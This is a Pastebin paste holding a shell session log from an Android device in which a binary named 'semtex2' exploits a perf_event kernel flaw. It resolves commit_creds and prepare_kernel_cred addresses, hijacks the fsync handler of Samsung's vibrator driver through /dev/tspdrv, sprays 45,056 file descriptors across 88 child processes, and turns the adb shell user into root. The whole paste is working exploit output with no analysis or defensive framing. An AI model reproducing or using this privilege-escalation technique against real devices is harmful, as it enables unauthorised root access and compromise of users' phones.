Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- shell@android:/ $ id
- uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
- shell@android:/ $ /data/local/tmp/bin/uname -a
- Linux localhost 3.0.8-perf-I717UCLF6-CL773414 #1 SMP PREEMPT Sat Jun 23 20:21:19 KST 2012 armv7l GNU/Linux
- shell@android:/ $ /data/local/tmp/semtex2 "sh -i"
- main() located @ 0x8fb8, END() @ 0x979c: 2020 bytes (0x7e4)
- commit_creds() @ 0xc01ccf78
- prepare_kernel_cred() @ 0xc01cd670
- no ptmx_fops symbol for hi-jacking fsync()
- using Samsung's vibrator kernel module fops
- Vibetonz_fops @ 0xbf000fc0
- fsync @ 0xbf000ff8
- no perf_swevent_enabled symbol. try finding it manually
- mmap memory region: 0x10000000 - 0x12000000
- clearing mmap region to detect perf_event exploit
- kernel base assumed at: 0xc0000000
- memory gap size: 1342177280 (0x50000000)
- target perf_swevent_enabled index: 0x14000000 (335544320)
- searching for change in mmap region...
- found change at addr: 0x1118fcc8 (1 - '')
- cleaning up perf_event_open file-descriptors
- perf_swevent_enabled is at: 0xc118fcc8
- # bytes from perf_swevent_enabled to reach fsync(): 0xfde71330 (-35187920)
- number of words being added to perf_swevent_enabled offset: 0x3f79c4cc (1064944844)
- 45056 FD's needed using 88 child processes (512 fd's/pid)
- sleeping to let the children catch up...
- mapping memory for exploit code at: 0xb000 - 0xc000
- opening /dev/tspdrv
- triggering file_ops.fsync()!
- shell@android:/ # id
- uid=0(root) gid=0(root)
- shell@android:/ # exit
- attempting to reap child proccesses...
- children killed... hopefully the kernel won't panic() :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement